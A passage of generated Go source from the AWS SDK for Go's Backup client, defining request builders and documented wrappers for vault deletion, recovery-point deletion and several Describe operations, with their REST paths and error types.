req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// DeleteBackupVault API operation for AWS Backup.
//
// Deletes the backup vault identified by its name. A vault can be deleted only
// if it is empty.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DeleteBackupVault for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupVault
func (c *Backup) DeleteBackupVault(input *DeleteBackupVaultInput) (*DeleteBackupVaultOutput, error) {
req, out := c.DeleteBackupVaultRequest(input)
return out, req.Send()
}
// DeleteBackupVaultWithContext is the same as DeleteBackupVault with the addition of
// the ability to pass a context and additional request options.
//
// See DeleteBackupVault for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DeleteBackupVaultWithContext(ctx aws.Context, input *DeleteBackupVaultInput, opts ...request.Option) (*DeleteBackupVaultOutput, error) {
req, out := c.DeleteBackupVaultRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDeleteBackupVaultAccessPolicy = "DeleteBackupVaultAccessPolicy"
// DeleteBackupVaultAccessPolicyRequest generates a "aws/request.Request" representing the
// client's request for the DeleteBackupVaultAccessPolicy operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DeleteBackupVaultAccessPolicy for more information on using the DeleteBackupVaultAccessPolicy
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DeleteBackupVaultAccessPolicyRequest method.
// req, resp := client.DeleteBackupVaultAccessPolicyRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupVaultAccessPolicy
func (c *Backup) DeleteBackupVaultAccessPolicyRequest(input *DeleteBackupVaultAccessPolicyInput) (req *request.Request, output *DeleteBackupVaultAccessPolicyOutput) {
op := &request.Operation{
Name: opDeleteBackupVaultAccessPolicy,
HTTPMethod: "DELETE",
HTTPPath: "/backup-vaults/{backupVaultName}/access-policy",
}
if input == nil {
input = &DeleteBackupVaultAccessPolicyInput{}
}
output = &DeleteBackupVaultAccessPolicyOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// DeleteBackupVaultAccessPolicy API operation for AWS Backup.
//
// Deletes the policy document that manages permissions on a backup vault.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DeleteBackupVaultAccessPolicy for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupVaultAccessPolicy
func (c *Backup) DeleteBackupVaultAccessPolicy(input *DeleteBackupVaultAccessPolicyInput) (*DeleteBackupVaultAccessPolicyOutput, error) {
req, out := c.DeleteBackupVaultAccessPolicyRequest(input)
return out, req.Send()
}
// DeleteBackupVaultAccessPolicyWithContext is the same as DeleteBackupVaultAccessPolicy with the addition of
// the ability to pass a context and additional request options.
//
// See DeleteBackupVaultAccessPolicy for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DeleteBackupVaultAccessPolicyWithContext(ctx aws.Context, input *DeleteBackupVaultAccessPolicyInput, opts ...request.Option) (*DeleteBackupVaultAccessPolicyOutput, error) {
req, out := c.DeleteBackupVaultAccessPolicyRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDeleteBackupVaultNotifications = "DeleteBackupVaultNotifications"
// DeleteBackupVaultNotificationsRequest generates a "aws/request.Request" representing the
// client's request for the DeleteBackupVaultNotifications operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DeleteBackupVaultNotifications for more information on using the DeleteBackupVaultNotifications
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DeleteBackupVaultNotificationsRequest method.
// req, resp := client.DeleteBackupVaultNotificationsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupVaultNotifications
func (c *Backup) DeleteBackupVaultNotificationsRequest(input *DeleteBackupVaultNotificationsInput) (req *request.Request, output *DeleteBackupVaultNotificationsOutput) {
op := &request.Operation{
Name: opDeleteBackupVaultNotifications,
HTTPMethod: "DELETE",
HTTPPath: "/backup-vaults/{backupVaultName}/notification-configuration",
}
if input == nil {
input = &DeleteBackupVaultNotificationsInput{}
}
output = &DeleteBackupVaultNotificationsOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// DeleteBackupVaultNotifications API operation for AWS Backup.
//
// Deletes event notifications for the specified backup vault.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DeleteBackupVaultNotifications for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupVaultNotifications
func (c *Backup) DeleteBackupVaultNotifications(input *DeleteBackupVaultNotificationsInput) (*DeleteBackupVaultNotificationsOutput, error) {
req, out := c.DeleteBackupVaultNotificationsRequest(input)
return out, req.Send()
}
// DeleteBackupVaultNotificationsWithContext is the same as DeleteBackupVaultNotifications with the addition of
// the ability to pass a context and additional request options.
//
// See DeleteBackupVaultNotifications for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DeleteBackupVaultNotificationsWithContext(ctx aws.Context, input *DeleteBackupVaultNotificationsInput, opts ...request.Option) (*DeleteBackupVaultNotificationsOutput, error) {
req, out := c.DeleteBackupVaultNotificationsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDeleteRecoveryPoint = "DeleteRecoveryPoint"
// DeleteRecoveryPointRequest generates a "aws/request.Request" representing the
// client's request for the DeleteRecoveryPoint operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DeleteRecoveryPoint for more information on using the DeleteRecoveryPoint
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DeleteRecoveryPointRequest method.
// req, resp := client.DeleteRecoveryPointRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteRecoveryPoint
func (c *Backup) DeleteRecoveryPointRequest(input *DeleteRecoveryPointInput) (req *request.Request, output *DeleteRecoveryPointOutput) {
op := &request.Operation{
Name: opDeleteRecoveryPoint,
HTTPMethod: "DELETE",
HTTPPath: "/backup-vaults/{backupVaultName}/recovery-points/{recoveryPointArn}",
}
if input == nil {
input = &DeleteRecoveryPointInput{}
}
output = &DeleteRecoveryPointOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// DeleteRecoveryPoint API operation for AWS Backup.
//
// Deletes the recovery point specified by a recovery point ID.
//
// If the recovery point ID belongs to a continuous backup, calling this endpoint
// deletes the existing continuous backup and stops future continuous backup.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DeleteRecoveryPoint for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * InvalidResourceStateException
// AWS Backup is already performing an action on this recovery point. It can't
// perform the action you requested until the first action finishes. Try again
// later.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteRecoveryPoint
func (c *Backup) DeleteRecoveryPoint(input *DeleteRecoveryPointInput) (*DeleteRecoveryPointOutput, error) {
req, out := c.DeleteRecoveryPointRequest(input)
return out, req.Send()
}
// DeleteRecoveryPointWithContext is the same as DeleteRecoveryPoint with the addition of
// the ability to pass a context and additional request options.
//
// See DeleteRecoveryPoint for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DeleteRecoveryPointWithContext(ctx aws.Context, input *DeleteRecoveryPointInput, opts ...request.Option) (*DeleteRecoveryPointOutput, error) {
req, out := c.DeleteRecoveryPointRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDescribeBackupJob = "DescribeBackupJob"
// DescribeBackupJobRequest generates a "aws/request.Request" representing the
// client's request for the DescribeBackupJob operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DescribeBackupJob for more information on using the DescribeBackupJob
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DescribeBackupJobRequest method.
// req, resp := client.DescribeBackupJobRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeBackupJob
func (c *Backup) DescribeBackupJobRequest(input *DescribeBackupJobInput) (req *request.Request, output *DescribeBackupJobOutput) {
op := &request.Operation{
Name: opDescribeBackupJob,
HTTPMethod: "GET",
HTTPPath: "/backup-jobs/{backupJobId}",
}
if input == nil {
input = &DescribeBackupJobInput{}
}
output = &DescribeBackupJobOutput{}
req = c.newRequest(op, input, output)
return
}
// DescribeBackupJob API operation for AWS Backup.
//
// Returns backup job details for the specified BackupJobId.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DescribeBackupJob for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * DependencyFailureException
// A dependent AWS service or resource returned an error to the AWS Backup service,
// and the action cannot be completed.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeBackupJob
func (c *Backup) DescribeBackupJob(input *DescribeBackupJobInput) (*DescribeBackupJobOutput, error) {
req, out := c.DescribeBackupJobRequest(input)
return out, req.Send()
}
// DescribeBackupJobWithContext is the same as DescribeBackupJob with the addition of
// the ability to pass a context and additional request options.
//
// See DescribeBackupJob for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DescribeBackupJobWithContext(ctx aws.Context, input *DescribeBackupJobInput, opts ...request.Option) (*DescribeBackupJobOutput, error) {
req, out := c.DescribeBackupJobRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDescribeBackupVault = "DescribeBackupVault"
// DescribeBackupVaultRequest generates a "aws/request.Request" representing the
// client's request for the DescribeBackupVault operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DescribeBackupVault for more information on using the DescribeBackupVault
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DescribeBackupVaultRequest method.
// req, resp := client.DescribeBackupVaultRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeBackupVault
func (c *Backup) DescribeBackupVaultRequest(input *DescribeBackupVaultInput) (req *request.Request, output *DescribeBackupVaultOutput) {
op := &request.Operation{
Name: opDescribeBackupVault,
HTTPMethod: "GET",
HTTPPath: "/backup-vaults/{backupVaultName}",
}
if input == nil {
input = &DescribeBackupVaultInput{}
}
output = &DescribeBackupVaultOutput{}
req = c.newRequest(op, input, output)
return
}
// DescribeBackupVault API operation for AWS Backup.
//
// Returns metadata about a backup vault specified by its name.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DescribeBackupVault for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeBackupVault
func (c *Backup) DescribeBackupVault(input *DescribeBackupVaultInput) (*DescribeBackupVaultOutput, error) {
req, out := c.DescribeBackupVaultRequest(input)
return out, req.Send()
}
// DescribeBackupVaultWithContext is the same as DescribeBackupVault with the addition of
// the ability to pass a context and additional request options.
//
// See DescribeBackupVault for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DescribeBackupVaultWithContext(ctx aws.Context, input *DescribeBackupVaultInput, opts ...request.Option) (*DescribeBackupVaultOutput, error) {
req, out := c.DescribeBackupVaultRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDescribeCopyJob = "DescribeCopyJob"
// DescribeCopyJobRequest generates a "aws/request.Request" representing the
// client's request for the DescribeCopyJob operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DescribeCopyJob for more information on using the DescribeCopyJob
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DescribeCopyJobRequest method.
// req, resp := client.DescribeCopyJobRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeCopyJob
func (c *Backup) DescribeCopyJobRequest(input *DescribeCopyJobInput) (req *request.Request, output *DescribeCopyJobOutput) {
op := &request.Operation{
Name: opDescribeCopyJob,
HTTPMethod: "GET",
HTTPPath: "/copy-jobs/{copyJobId}",
}
if input == nil {
input = &DescribeCopyJobInput{}
}
output = &DescribeCopyJobOutput{}
req = c.newRequest(op, input, output)
return
}
// DescribeCopyJob API operation for AWS Backup.
//
// Returns metadata associated with creating a copy of a resource.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DescribeCopyJob for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeCopyJob
func (c *Backup) DescribeCopyJob(input *DescribeCopyJobInput) (*DescribeCopyJobOutput, error) {
req, out := c.DescribeCopyJobRequest(input)
return out, req.Send()
}
// DescribeCopyJobWithContext is the same as DescribeCopyJob with the addition of
// the ability to pass a context and additional request options.
//
// See DescribeCopyJob for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DescribeCopyJobWithContext(ctx aws.Context, input *DescribeCopyJobInput, opts ...request.Option) (*DescribeCopyJobOutput, error) {
req, out := c.DescribeCopyJobRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDescribeGlobalSettings = "DescribeGlobalSettings"
// DescribeGlobalSettingsRequest generates a "aws/request.Request" representing the
// client's request for the DescribeGlobalSettings operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DescribeGlobalSettings for more information on using the DescribeGlobalSettings
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DescribeGlobalSettingsRequest method.
// req, resp := client.DescribeGlobalSettingsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeGlobalSettings
func (c *Backup) DescribeGlobalSettingsRequest(input *DescribeGlobalSettingsInput) (req *request.Request, output *DescribeGlobalSettingsOutput) {
op := &request.Operation{
Name: opDescribeGlobalSettings,
HTTPMethod: "GET",
HTTPPath: "/global-settings",
}
if input == nil {
input = &DescribeGlobalSettingsInput{}
}
output = &DescribeGlobalSettingsOutput{}
req = c.newRequest(op, input, output)
return
}
// DescribeGlobalSettings API operation for AWS Backup.
//
// Describes the global settings of the AWS account, including whether it is
// opted in to cross-account backup.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DescribeGlobalSettings for usage and error information.
//
// Returned Error Types:
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeGlobalSettings
func (c *Backup) DescribeGlobalSettings(input *DescribeGlobalSettingsInput) (*DescribeGlobalSettingsOutput, error) {
req, out := c.DescribeGlobalSettingsRequest(input)
return out, req.Send()
}
// DescribeGlobalSettingsWithContext is the same as DescribeGlobalSettings with the addition of
// the ability to pass a context and additional request options.
//
// See DescribeGlobalSettings for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DescribeGlobalSettingsWithContext(ctx aws.Context, input *DescribeGlobalSettingsInput, opts ...request.Option) (*DescribeGlobalSettingsOutput, error) {
req, out := c.DescribeGlobalSettingsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDescribeProtectedResource = "DescribeProtectedResource"
// DescribeProtectedResourceRequest generates a "aws/request.Request" representing the
// client's request for the DescribeProtectedResource operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DescribeProtectedResource for more information on using the DescribeProtectedResource
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DescribeProtectedResourceRequest method.
// req, resp := client.DescribeProtectedResourceRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeProtectedResource
func (c *Backup) DescribeProtectedResourceRequest(input *DescribeProtectedResourceInput) (req *request.Request, output *DescribeProtectedResourceOutput) {
op := &request.Operation{
Name: opDescribeProtectedResource,
HTTPMethod: "GET",
HTTPPath: "/resources/{resourceArn}",
}
if input == nil {
input = &DescribeProtectedResourceInput{}
}
output = &DescribeProtectedResourceOutput{}
req = c.newRequest(op, input, output)
return
}
// DescribeProtectedResource API operation for AWS Backup.
//
// Returns information about a saved resource, including the last time it was
// backed up, its Amazon Resource Name (ARN), and the AWS service type of the
// saved resource.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DescribeProtectedResource for usage and error information.
//
// Returned Error Types:
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeProtectedResource
func (c *Backup) DescribeProtectedResource(input *DescribeProtectedResourceInput) (*DescribeProtectedResourceOutput, error) {
req, out := c.DescribeProtectedResourceRequest(input)
return out, req.Send()
}
// DescribeProtectedResourceWithContext is the same as DescribeProtectedResource with the addition of
// the ability to pass a context and additional request options.
//
// See DescribeProtectedResource for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DescribeProtectedResourceWithContext(ctx aws.Context, input *DescribeProtectedResourceInput, opts ...request.Option) (*DescribeProtectedResourceOutput, error) {
req, out := c.DescribeProtectedResourceRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDescribeRecoveryPoint = "DescribeRecoveryPoint"
// DescribeRecoveryPointRequest generates a "aws/request.Request" representing the
// client's request for the DescribeRecoveryPoint operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DescribeRecoveryPoint for more information on using the DescribeRecoveryPoint
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DescribeRecoveryPointRequest method.
// req, resp := client.DescribeRecoveryPointRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeRecoveryPoint
func (c *Backup) DescribeRecoveryPointRequest(input *DescribeRecoveryPointInput) (req *request.Request, output *DescribeRecoveryPointOutput) {
op := &request.Operation{
Name: opDescribeRecoveryPoint,
HTTPMethod: "GET",
HTTPPath: "/backup-vaults/{backupVaultName}/recovery-points/{recoveryPointArn}",
}
if input == nil {
input = &DescribeRecoveryPointInput{}
}
output = &DescribeRecoveryPointOutput{}
req = c.newRequest(op, input, output)
return
}
// DescribeRecoveryPoint API operation for AWS Backup.
//
// Returns metadata associated with a recovery point, including ID, status,
// encryption, and lifecycle.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DescribeRecoveryPoint for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeRecoveryPoint
func (c *Backup) DescribeRecoveryPoint(input *DescribeRecoveryPointInput) (*DescribeRecoveryPointOutput, error) {
req, out := c.DescribeRecoveryPointRequest(input)
return out, req.Send()
}
// DescribeRecoveryPointWithContext is the same as DescribeRecoveryPoint with the addition of
// the ability to pass a context and additional request options.
//
// See DescribeRecoveryPoint for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DescribeRecoveryPointWithContext(ctx aws.Context, input *DescribeRecoveryPointInput, opts ...request.Option) (*DescribeRecoveryPointOutput, error) {
req, out := c.DescribeRecoveryPointRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDescribeRegionSettings = "DescribeRegionSettings"
// DescribeRegionSettingsRequest generates a "aws/request.Request" representing the
// client's request for the DescribeRegionSettings operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DescribeRegionSettings for more information on using the DescribeRegionSettings
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the DescribeRegionSettingsRequest method.
// req, resp := client.DescribeRegionSettingsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeRegionSettings
func (c *Backup) DescribeRegionSettingsRequest(input *DescribeRegionSettingsInput) (req *request.Request, output *DescribeRegionSettingsOutput) {
op := &request.Operation{
Name: opDescribeRegionSettings,
HTTPMethod: "GET",
HTTPPath: "/account-settings",
}
if input == nil {
input = &DescribeRegionSettingsInput{}
}
output = &DescribeRegionSettingsOutput{}
req = c.newRequest(op, input, output)
return
}
// DescribeRegionSettings API operation for AWS Backup.
//
// Returns the current service opt-in settings for the Region. If service-opt-in
// is enabled for a service, AWS Backup tries to protect that service's resources
// in this Region, when the resource is included in an on-demand backup or scheduled
// backup plan. Otherwise, AWS Backup does not try to protect that service's
// resources in this Region, AWS Backup does not try to protect that service's
// resources in this Region.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DescribeRegionSettings for usage and error information.
//
// Returned Error Types:
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeRegionSettings
func (c *Backup) DescribeRegionSettings(input *DescribeRegionSettingsInput) (*DescribeRegionSettingsOutput, error) {
req, out := c.DescribeRegionSettingsRequest(input)
return out, req.Send()
}
// DescribeRegionSettingsWithContext is the same as DescribeRegionSettings with the addition of
// the ability to pass a context and additional request options.
//
// See DescribeRegionSettings for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DescribeRegionSettingsWithContext(ctx aws.Context, input *DescribeRegionSettingsInput, opts ...request.Option) (*DescribeRegionSettingsOutput, error) {
req, out := c.DescribeRegionSettingsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
